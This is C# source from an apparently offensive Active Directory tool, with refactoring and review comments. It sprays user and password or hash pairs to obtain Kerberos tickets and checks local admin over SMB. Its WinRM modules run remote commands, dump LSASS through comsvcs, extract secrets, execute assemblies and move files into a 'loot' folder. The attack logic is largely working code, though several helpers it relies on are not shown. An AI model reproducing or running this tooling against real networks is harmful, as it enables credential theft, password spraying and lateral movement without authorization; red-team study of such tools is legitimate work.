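        /// <summary>
        /// Requests a TGT for <paramref name="user"/> through <c>Ask.TGT</c> while capturing
        /// everything it writes to the console, and hands that text back to the caller.
        /// Callers in this file decide success by string-matching the captured text.
        /// </summary>
        /// <param name="user">Account name to authenticate as.</param>
        /// <param name="domain">AD domain / Kerberos realm of the account.</param>
        /// <param name="hash">Kerberos key for the account (already derived; see <c>Crypto.KerberosPasswordHash</c>).</param>
        /// <param name="encType">Encryption type the key belongs to.</param>
        /// <param name="dc">Domain controller the request is sent to.</param>
        /// <returns>The console output produced by <c>Ask.TGT</c>; empty when it printed nothing.</returns>
        public static string AskTicket(string user, string domain, string hash, KERB_ETYPE encType, string dc)
        {
            LUID luid = new LUID();
            TextWriter originalConsoleOut = Console.Out;

            using (StringWriter capture = new StringWriter())
            {
                Console.SetOut(capture);
                try
                {
                    // The remaining arguments (null, true, luid, false) are passed exactly as the
                    // original did; their meaning is defined by Ask.TGT and is not verified here.
                    Ask.TGT(user, domain, hash, encType, null, true, dc, luid, false);
                }
                finally
                {
                    // Restore stdout even if Ask.TGT throws. The original restored it only on the
                    // success path, leaving Console.Out pointing at a StringWriter that is disposed
                    // when this using block ends.
                    Console.SetOut(originalConsoleOut);
                }
                capture.Flush();
                return capture.ToString();
            }
        }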
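        /// <summary>
        /// SMB job runner: obtains a TGT for each user/secret pair (or imports the supplied
        /// <paramref name="ticket"/>) under a fresh token, then runs <c>Smb.CheckLocalAdmin</c>
        /// against every reachable host.
        /// </summary>
        /// <param name="users">Accounts to try; ignored when <paramref name="ticket"/> is set.</param>
        /// <param name="domain">AD domain / Kerberos realm of the accounts.</param>
        /// <param name="passwords">Clear-text passwords; used only when <paramref name="hashes"/> is empty.</param>
        /// <param name="hashes">Pre-derived Kerberos keys; take precedence over <paramref name="passwords"/>.</param>
        /// <param name="ticket">Existing ticket to import instead of authenticating.</param>
        /// <param name="encType">Encryption type used for key derivation and the TGT request.</param>
        /// <param name="dc">Domain controller to authenticate against.</param>
        /// <param name="computernames">Target hosts; each is probed on TCP/445 first.</param>
        /// <param name="module">Forwarded to <c>Smb.CheckLocalAdmin</c>.</param>
        /// <param name="moduleargument">Not used by this runner; kept for signature parity.</param>
        /// <param name="flags">Not used by this runner; kept for signature parity.</param>
        public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, List <string> flags)
        {
            if (!String.IsNullOrEmpty(ticket))
            {
                RunSmbWithTicket(ticket, computernames, module);
                return;
            }

            // Hashes win over passwords when both lists are supplied, and the same switch decides
            // whether a secret still has to go through string-to-key. The original keyed that
            // decision off passwords.Length, so with both lists present it hashed the hashes.
            bool secretsAreKeys = hashes.Length > 0;
            string[] secrets = secretsAreKeys ? hashes : passwords;

            foreach (string user in users)
            {
                foreach (string secret in secrets)
                {
                    // Kerberos string-to-key salt: upper-cased realm followed by the principal name.
                    // ToUpperInvariant avoids culture-dependent casing (e.g. Turkish dotted/dotless i).
                    string hash = secretsAreKeys ? secret : Crypto.KerberosPasswordHash(encType, secret, domain.ToUpperInvariant() + user);

                    // NOTE(review): presumably a new-credentials style token so the injected TGT is
                    // used for outbound SMB — confirm against AToken. The revert sits in a finally:
                    // in the original, a failed TGT request hit 'continue' and skipped RevertFromToken,
                    // and an exception left the token active as well.
                    AToken.MakeToken("Fake", "Fake", "Fake");
                    try
                    {
                        Console.WriteLine("------------------");
                        Console.WriteLine(String.Format("[*] User:   {0}", user));
                        Console.WriteLine(String.Format("[*] domain: {0}", domain));
                        // The clear-text secret is echoed to stdout; console transcripts/logs will contain it.
                        Console.WriteLine(String.Format("[*] secret: {0}", secret));
                        string ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc);
                        if (!SmbTicketImported(ticketoutput))
                        {
                            Console.WriteLine("[-] Could not request TGT");
                            continue;
                        }
                        Console.WriteLine("[+] Ticket successfully imported!");
                        Console.WriteLine();
                        ScanSmbHosts(computernames, module);
                    }
                    finally
                    {
                        AToken.RevertFromToken();
                    }
                }
            }
        }

        /// <summary>Imports an existing ticket under a fresh token and scans the hosts with it.</summary>
        private static void RunSmbWithTicket(string ticket, string[] computernames, string module)
        {
            AToken.MakeToken("Fake", "Fake", "Fake");
            try
            {
                Console.WriteLine("------------------");
                Console.WriteLine(String.Format("[*] Ticket: {0}", ticket));
                string ticketoutput = SecurityContext.ImportTicket(ticket);
                if (!SmbTicketImported(ticketoutput))
                {
                    Console.WriteLine("[-] Could not import TGT");
                    return;
                }
                Console.WriteLine("[+] TGT imported successfully!");
                Console.WriteLine();
                ScanSmbHosts(computernames, module);
            }
            finally
            {
                // Always revert, including on the early return above.
                AToken.RevertFromToken();
            }
        }

        /// <summary>
        /// The ticket helpers report success only through their console text, so this matches the
        /// marker they print. It fails closed (returns false) if that text ever changes.
        /// </summary>
        private static bool SmbTicketImported(string ticketoutput)
        {
            return ticketoutput != null && ticketoutput.Contains("[+] Ticket successfully imported!");
        }

        /// <summary>Probes each host on TCP/445 and runs the SMB check against those that answer.</summary>
        private static void ScanSmbHosts(string[] computernames, string module)
        {
            foreach (string computername in computernames)
            {
                Console.WriteLine(String.Format("[*] Checking {0}", computername));
                if (!Misc.CheckHostPort(computername, 445))
                {
                    Console.WriteLine(String.Format("[-] Could Not Reach {0}:445", computername));
                    Console.WriteLine();
                    continue;
                }
                // CreateDirectory is a no-op for an existing directory, so no Exists() check is needed.
                // The host name becomes a path segment: it is operator input here, but a value with
                // separators or ".." would place the loot directory outside ./loot.
                Directory.CreateDirectory(Path.Combine("loot", computername));
                Smb.CheckLocalAdmin(computername, module);
                Console.WriteLine("");
            }
        }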
 /// <summary>
 /// SMB entry point: runs the whole job synchronously on the calling thread.
 /// A throttled task-based variant was left commented out in the original and is not reproduced.
 /// </summary>
 /// <param name="moduleargument">Forwarded unchanged; the SMB runner in this file does not use it.</param>
 /// <param name="flags">Forwarded unchanged; the SMB runner in this file does not use it.</param>
 public static void KerberosSmb(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, List <string> flags)
 {
     // Single pass: every user/secret pair and every host is tried in order, no fan-out.
     StartJob(
         users, domain, passwords, hashes, ticket, encType, dc,
         computernames, module, moduleargument, flags);
 }
 // P/Invoke declaration; the [DllImport] attribute that binds it to a native library is not
 // shown in this listing (presumably on the preceding line in the real file — confirm).
 // The int return is presumably an NTSTATUS-style code and the out parameter receives a native
 // pointer for the requested encryption type. NOTE(review): the name pCheckSum suggests a checksum
 // table, but CDLocateCSystem is the crypto-system lookup; the parameter name may have been copied
 // from a CDLocateCheckSum declaration — verify against the cryptdll documentation before relying on it.
 public static extern int CDLocateCSystem(KERB_ETYPE type, out IntPtr pCheckSum);
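        /// <summary>
        /// WinRM job runner: obtains a TGT for each user/secret pair (or imports the supplied
        /// <paramref name="ticket"/>), then runs the selected WinRM module against every
        /// reachable host. One token covers the whole job.
        /// </summary>
        /// <param name="users">Accounts to try; ignored when <paramref name="ticket"/> is set.</param>
        /// <param name="domain">AD domain / Kerberos realm of the accounts.</param>
        /// <param name="passwords">Clear-text passwords; used only when <paramref name="hashes"/> is empty.</param>
        /// <param name="hashes">Pre-derived Kerberos keys; take precedence over <paramref name="passwords"/>.</param>
        /// <param name="ticket">Existing ticket to import instead of authenticating.</param>
        /// <param name="encType">Encryption type used for key derivation and the TGT request.</param>
        /// <param name="dc">Domain controller to authenticate against.</param>
        /// <param name="computernames">Target hosts; each is probed on TCP/5985 first.</param>
        /// <param name="module">Module selector, matched by substring: empty/"exec", "comsvcs", "secret(s)", "assembly", "download", "upload".</param>
        /// <param name="moduleargument">Argument for the exec and assembly modules.</param>
        /// <param name="path">Path argument for the assembly, download and upload modules.</param>
        /// <param name="destination">Destination for the download and upload modules.</param>
        /// <param name="flags">Extra flags forwarded to the exec and assembly modules.</param>
        public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, string path, string destination, List <string> flags)
        {
            // NOTE(review): presumably a new-credentials style token so injected tickets are used for
            // outbound WinRM — confirm against AToken. The revert is in a finally: the original only
            // reverted on the fall-through path, so the early return on a failed ticket import (and any
            // exception) left the impersonation token active.
            AToken.MakeToken("Fake", "Fake", "Fake");
            try
            {
                if (String.IsNullOrEmpty(ticket))
                {
                    // Hashes win over passwords when both lists are supplied, and the same switch
                    // decides whether a secret still needs string-to-key. The original keyed that off
                    // passwords.Length, so with both lists present it hashed the hashes.
                    bool secretsAreKeys = hashes.Length > 0;
                    string[] secrets = secretsAreKeys ? hashes : passwords;

                    foreach (string user in users)
                    {
                        foreach (string secret in secrets)
                        {
                            // Salt is the upper-cased realm plus principal; invariant casing avoids
                            // culture-dependent results (e.g. Turkish i).
                            string hash = secretsAreKeys ? secret : Crypto.KerberosPasswordHash(encType, secret, domain.ToUpperInvariant() + user);

                            Console.WriteLine("------------------");
                            Console.WriteLine(String.Format("[*] User:   {0}", user));
                            Console.WriteLine(String.Format("[*] domain: {0}", domain));
                            // The clear-text secret is echoed to stdout; console transcripts/logs will contain it.
                            Console.WriteLine(String.Format("[*] secret: {0}", secret));
                            string ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc);
                            if (!WinRmTicketImported(ticketoutput))
                            {
                                Console.WriteLine("[-] Could not request TGT");
                                continue;
                            }
                            Console.WriteLine("[+] Ticket successfully imported!");
                            Console.WriteLine();
                            ScanWinRmHosts(computernames, module, moduleargument, path, destination, flags);
                        }
                    }
                }
                else
                {
                    Console.WriteLine("------------------");
                    Console.WriteLine(String.Format("[*] Ticket: {0}", ticket));
                    string ticketoutput = SecurityContext.ImportTicket(ticket);
                    if (!WinRmTicketImported(ticketoutput))
                    {
                        Console.WriteLine("[-] Could not import TGT");
                        return;
                    }
                    Console.WriteLine("[+] TGT imported successfully!");
                    Console.WriteLine();
                    ScanWinRmHosts(computernames, module, moduleargument, path, destination, flags);
                }
            }
            finally
            {
                AToken.RevertFromToken();
            }
        }

        /// <summary>
        /// The ticket helpers report success only through their console text, so this matches the
        /// marker they print. It fails closed (returns false) if that text ever changes.
        /// </summary>
        private static bool WinRmTicketImported(string ticketoutput)
        {
            return ticketoutput != null && ticketoutput.Contains("[+] Ticket successfully imported!");
        }

        /// <summary>Probes each host on TCP/5985 and dispatches the selected module to those that answer.</summary>
        private static void ScanWinRmHosts(string[] computernames, string module, string moduleargument, string path, string destination, List<string> flags)
        {
            foreach (string computername in computernames)
            {
                Console.WriteLine(String.Format("[*] Checking {0}", computername));
                if (!Misc.CheckHostPort(computername, 5985))
                {
                    // The original's ticket branch passed 'flags' as an unused extra format argument here.
                    Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername));
                    Console.WriteLine();
                    continue;
                }
                // CreateDirectory is a no-op for an existing directory, so no Exists() check is needed.
                // The host name becomes a path segment: it is operator input here, but a value with
                // separators or ".." would place the loot directory outside ./loot.
                Directory.CreateDirectory(Path.Combine("loot", computername));
                RunWinRmModule(computername, module, moduleargument, path, destination, flags);
                Console.WriteLine("");
            }
        }

        /// <summary>
        /// Runs one module against one host. Selection is by substring, checked in this order:
        /// empty/"exec", "comsvcs", "secret", "assembly", "download", "upload". A module string that
        /// matches none of them results in no action for the host (and no message), as in the original.
        /// </summary>
        private static void RunWinRmModule(string computername, string module, string moduleargument, string path, string destination, List<string> flags)
        {
            if (module.Length == 0 || module.Contains("exec"))
            {
                Wsman.CheckLocalAdmin(computername, moduleargument, flags);
            }
            else if (module.Contains("comsvcs"))
            {
                Wsman.InvokeComSvcsLsassDump(computername);
            }
            else if (module.Contains("secret"))
            {
                // "secrets" also contains "secret", so this single check covers the original's two.
                Wsman.GetSecrets(computername);
            }
            else if (module.Contains("assembly"))
            {
                Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
            }
            else if (module.Contains("download"))
            {
                Wsman.CopyFile(computername, path, destination);
            }
            else if (module.Contains("upload"))
            {
                Wsman.UploadFile(computername, path, destination);
            }
        }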
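 /// <summary>
 /// WinRM entry point: validates the module-specific arguments up front, then hands the
 /// job to <c>StartJob</c> on the calling thread (the task-based variant was commented out
 /// in the original and is not reproduced).
 /// </summary>
 /// <param name="hash">Pre-derived Kerberos keys (called <c>hashes</c> in StartJob).</param>
 /// <param name="module">Module selector; the checks below apply when it contains "exec", "assembly", "download" or "upload".</param>
 /// <param name="moduleargument">Command line for the exec module; required for it.</param>
 /// <param name="path">Local assembly file for the assembly module (must exist); source path for download/upload.</param>
 /// <param name="destination">Destination path for download/upload.</param>
 public static void KerberosWinRm(string[] users, string domain, string[] passwords, string[] hash, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, string path, string destination, List <string> flags)
 {
     // Substring matching mirrors StartJob's dispatch so these pre-checks and the dispatch agree
     // on which module a given string selects. IsNullOrEmpty (rather than .Length == 0) also
     // catches a null argument instead of throwing on it.
     if (module.Contains("exec") && String.IsNullOrEmpty(moduleargument))
     {
         Console.WriteLine("[-] Missing exec argument");
         return;
     }
     // File.Exists is false for a null or unreadable path, so both "not given" and "not found" end here.
     if (module.Contains("assembly") && !File.Exists(path))
     {
         Console.WriteLine("[-] Missing assembly path");
         return;
     }
     // download and upload share the same requirement and the same message.
     bool transfersFile = module.Contains("download") || module.Contains("upload");
     if (transfersFile && (String.IsNullOrEmpty(path) || String.IsNullOrEmpty(destination)))
     {
         Console.WriteLine("[-] Need path and destination");
         return;
     }
     StartJob(users, domain, passwords, hash, ticket, encType, dc, computernames, module, moduleargument, path, destination, flags);
 }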
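        /// <summary>
        /// Protocol-agnostic job runner: obtains a TGT for each user/secret pair (or imports the
        /// supplied <paramref name="ticket"/>), then runs the scan selected by
        /// <paramref name="protocol"/>. One token covers the whole job.
        /// </summary>
        /// <param name="users">Accounts to try; ignored when <paramref name="ticket"/> is set.</param>
        /// <param name="domain">AD domain / Kerberos realm; also passed to the LDAP scan.</param>
        /// <param name="passwords">Clear-text passwords; used only when <paramref name="hashes"/> is empty.</param>
        /// <param name="hashes">Pre-derived Kerberos keys; take precedence over <paramref name="passwords"/>.</param>
        /// <param name="ticket">Existing ticket to import instead of authenticating.</param>
        /// <param name="encType">Encryption type used for key derivation and the TGT request.</param>
        /// <param name="dc">Domain controller to authenticate against; also passed to the LDAP scan.</param>
        /// <param name="computernames">Target hosts for the smb/winrm/reg32 scans.</param>
        /// <param name="module">Module selector forwarded to the chosen scan.</param>
        /// <param name="moduleargument">Forwarded to the winrm scan only.</param>
        /// <param name="path">Forwarded to the winrm scan only.</param>
        /// <param name="destination">Forwarded to the winrm scan only.</param>
        /// <param name="flags">Forwarded to the winrm scan only.</param>
        /// <param name="protocol">"smb", "winrm", "reg32" or "ldap", compared case-insensitively.</param>
        public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, string path, string destination, List <string> flags, string protocol)
        {
            // NOTE(review): presumably a new-credentials style token so injected tickets are used for
            // outbound connections — confirm against AToken. The revert is in a finally: the original
            // only reverted on the fall-through path, so the early return on a failed ticket import
            // (and any exception) left the impersonation token active.
            AToken.MakeToken("Fake", "Fake", "Fake");
            Console.WriteLine("------------------");
            try
            {
                if (String.IsNullOrEmpty(ticket))
                {
                    // Hashes win over passwords when both lists are supplied, and the same switch
                    // decides whether a secret still needs string-to-key. The original keyed that off
                    // passwords.Length, so with both lists present it hashed the hashes.
                    bool secretsAreKeys = hashes.Length > 0;
                    string[] secrets = secretsAreKeys ? hashes : passwords;

                    foreach (string user in users)
                    {
                        foreach (string secret in secrets)
                        {
                            // Salt is the upper-cased realm plus principal; invariant casing avoids
                            // culture-dependent results (e.g. Turkish i).
                            string hash = secretsAreKeys ? secret : Crypto.KerberosPasswordHash(encType, secret, domain.ToUpperInvariant() + user);
                            Console.WriteLine(String.Format("[*] User:   {0}", user));
                            Console.WriteLine(String.Format("[*] Domain: {0}", domain));
                            // The clear-text secret is echoed to stdout; console transcripts/logs will contain it.
                            Console.WriteLine(String.Format("[*] Secret: {0}", secret));
                            string ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc);
                            if (!ScanTicketImported(ticketoutput))
                            {
                                Console.WriteLine("[-] Could not request TGT");
                                continue;
                            }
                            Console.WriteLine("[+] Ticket successfully imported!");
                            RunProtocolScan(protocol, computernames, module, moduleargument, path, destination, flags, domain, dc);
                        }
                    }
                }
                else
                {
                    Console.WriteLine(String.Format("[*] Ticket: {0}", ticket));
                    string ticketoutput = SecurityContext.ImportTicket(ticket);
                    if (!ScanTicketImported(ticketoutput))
                    {
                        Console.WriteLine("[-] Could not import TGT");
                        return;
                    }
                    Console.WriteLine("[+] TGT imported successfully!");
                    RunProtocolScan(protocol, computernames, module, moduleargument, path, destination, flags, domain, dc);
                }
            }
            finally
            {
                AToken.RevertFromToken();
            }
        }

        /// <summary>
        /// The ticket helpers report success only through their console text, so this matches the
        /// marker they print. It fails closed (returns false) if that text ever changes.
        /// </summary>
        private static bool ScanTicketImported(string ticketoutput)
        {
            return ticketoutput != null && ticketoutput.Contains("[+] Ticket successfully imported!");
        }

        /// <summary>
        /// Dispatches to the scan named by <paramref name="protocol"/>. Comparison is ordinal and
        /// case-insensitive: the original lower-cased with the current culture, which under e.g.
        /// tr-TR turns "WINRM" into "wınrm" and never matches. An unknown protocol runs nothing and
        /// prints nothing, as in the original.
        /// </summary>
        private static void RunProtocolScan(string protocol, string[] computernames, string module, string moduleargument, string path, string destination, List<string> flags, string domain, string dc)
        {
            if (String.Equals(protocol, "smb", StringComparison.OrdinalIgnoreCase))
            {
                Scan.SMB(computernames, module);
            }
            else if (String.Equals(protocol, "winrm", StringComparison.OrdinalIgnoreCase))
            {
                Scan.WINRM(computernames, module, moduleargument, path, destination, flags);
            }
            else if (String.Equals(protocol, "reg32", StringComparison.OrdinalIgnoreCase))
            {
                Scan.REG32(computernames, module);
            }
            else if (String.Equals(protocol, "ldap", StringComparison.OrdinalIgnoreCase))
            {
                Scan.LDAP(module, domain, dc);
            }
        }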
 /// <summary>
 /// Generic entry point: runs the protocol-selected job synchronously on the calling thread.
 /// A throttled task-based variant was left commented out in the original and is not reproduced.
 /// </summary>
 /// <param name="protocol">Scan to run ("smb", "winrm", "reg32" or "ldap"); interpreted by <c>StartJob</c>.</param>
 public static void Kerberos(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, string path, string destination, List <string> flags, string protocol)
 {
     // Single pass, no fan-out; all arguments are forwarded unchanged.
     StartJob(
         users, domain, passwords, hashes, ticket, encType, dc,
         computernames, module, moduleargument, path, destination, flags, protocol);
 }